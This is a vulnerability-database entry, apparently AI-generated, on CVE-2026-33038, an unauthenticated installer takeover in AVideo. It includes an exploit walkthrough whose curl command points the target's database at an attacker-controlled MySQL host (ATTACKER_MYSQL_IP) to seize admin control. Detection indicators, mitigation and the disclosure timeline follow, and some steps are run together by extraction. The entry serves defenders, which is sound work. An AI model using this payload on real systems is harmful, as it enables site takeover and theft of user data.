
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33038 is an unauthenticated application takeover vulnerability in WWBN AVideo affecting all versions prior to 26.0 (patched versions >= 24.0 per the security advisory). The vulnerability exists in the install/checkConfiguration.php endpoint, which performs full application initialization — including database setup, admin account creation, and configuration file writing — without any authentication, CSRF protection, or access restriction. It was discovered and reported by bugbunny.ai, published on March 16, 2026, and added to the NVD on March 20, 2026. It carries a CVSS v3.1 base score of 8.1 (High) (GitHub Advisory, AVideo Security Advisory).
The root cause is CWE-306 (Missing Authentication for Critical Function), with a secondary weakness of CWE-89 (SQL Injection). The install/checkConfiguration.php endpoint's sole guard is a file-existence check for videos/configuration.php; if that file is absent (fresh deployment, container restart without persistent storage, or re-deployment), the entire installer executes with attacker-supplied POST parameters. Critically, the endpoint accepts an attacker-controlled databaseHost parameter, allowing the attacker to point the application at their own MySQL server — eliminating the need to guess legitimate database credentials. Additionally, $_POST['contactEmail'] is directly concatenated into an SQL INSERT statement on line 120 without sanitization, enabling SQL injection. The fix (commit b3fa786) added session-based CSRF token validation, prepared statements for SQL queries, and a new install/.htaccess to disable directory listing (GitHub Advisory, Patch Commit).
Successful exploitation results in full application takeover: the attacker becomes the sole administrator with complete control over the AVideo instance. A persistent backdoor is established by writing attacker-controlled database credentials to videos/configuration.php, ensuring continued access even after the initial attack. If the attacker redirects the application to their own database, all future user data — including registrations, uploads, and comments — is exfiltrated to the attacker. Admin access further enables file uploads and plugin management, creating a pathway to arbitrary PHP code execution on the server (GitHub Advisory, AVideo Security Advisory).
A detailed, fully actionable proof-of-concept exploit is publicly available in the GitHub Security Advisory, including specific curl commands with attacker-controlled POST parameters targeting /install/checkConfiguration.php. Exploitation requires the application to be in an uninitialized state (no videos/configuration.php present), which is the primary complexity factor. There is no confirmed evidence of in-the-wild exploitation at this time, and no threat actor attribution has been reported. The EPSS score is approximately 0.085% (0.0011 per Feedly data), and the vulnerability is not currently listed in the CISA KEV catalog (AVideo Security Advisory, GitHub Advisory).
/install/checkConfiguration.php is accessible and videos/configuration.php does not exist (e.g., by probing the endpoint for a non-exit response).mysql -e "CREATE DATABASE avideo;"
mysql avideo < database.sql # Use AVideo's own schema filecurl -s -X POST https://TARGET/install/checkConfiguration.php \
-d 'systemRootPath=/var/www/html/AVideo/' \
-d 'databaseHost=ATTACKER_MYSQL_IP' \
-d 'databasePort=3306' \
-d 'databaseUser=attacker' \
-d 'databasePass=attacker_pass' \
-d 'databaseName=avideo' \
-d 'createTables=1' \
-d 'contactEmail=attacker@example.com' \
-d 'systemAdminPass=AttackerPass123!' \
-d 'webSiteTitle=Pwned' \
-d 'mainLanguage=en_US' \
-d 'webSiteRootURL=https://TARGET/'videos/configuration.php with attacker-controlled database credentials — permanently redirecting the application.admin / AttackerPass123! to gain full administrative control./install/checkConfiguration.php from external IP addresses; outbound MySQL connections from the AVideo server to unknown external IPs on port 3306.videos/configuration.php with unfamiliar databaseHost values pointing to external IPs; new or modified files in the install/ directory; unexpected PHP web shells in the AVideo web root or upload directories./install/checkConfiguration.php from non-localhost addresses; PHP error logs containing entries like "Can not create configuration again" (indicating repeated takeover attempts); database connection logs showing connections from the AVideo server to external MySQL hosts.bash, curl, wget) that may indicate post-exploitation RCE via uploaded web shells.admin user account with an unexpected email address or password hash in the users table; unexpected database schema or tables consistent with AVideo being re-initialized (AVideo Security Advisory).Update AVideo to version 26.0 or later (patched versions >= 24.0 per the security advisory), which includes CSRF token validation on the installer endpoint, prepared statements to prevent SQL injection, and a new install/.htaccess file. As an immediate workaround, restrict web access to the install/ directory via web server configuration (e.g., add Require local to install/.htaccess) or block access at the network/firewall level. Additionally, verify that videos/configuration.php exists and contains legitimate database credentials, and audit the users table for unauthorized admin accounts. Monitor configuration.php for unexpected modifications and review database access logs for connections to external hosts (GitHub Advisory, Patch Commit).
The vulnerability was discovered and responsibly disclosed by bugbunny.ai, with the advisory published by the AVideo maintainer (DanielnetoDotCom) on March 16, 2026. The fix was committed promptly (commit b3fa786), implementing CSRF protection and prepared statements. Coverage has appeared on aggregator sites including VulDB, CVEFeed, and exploit-intel.com, as well as community blogs, indicating moderate security community interest. No major vendor statements beyond the official advisory or notable threat actor commentary have been identified at this time (GitHub Advisory, AVideo Security Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."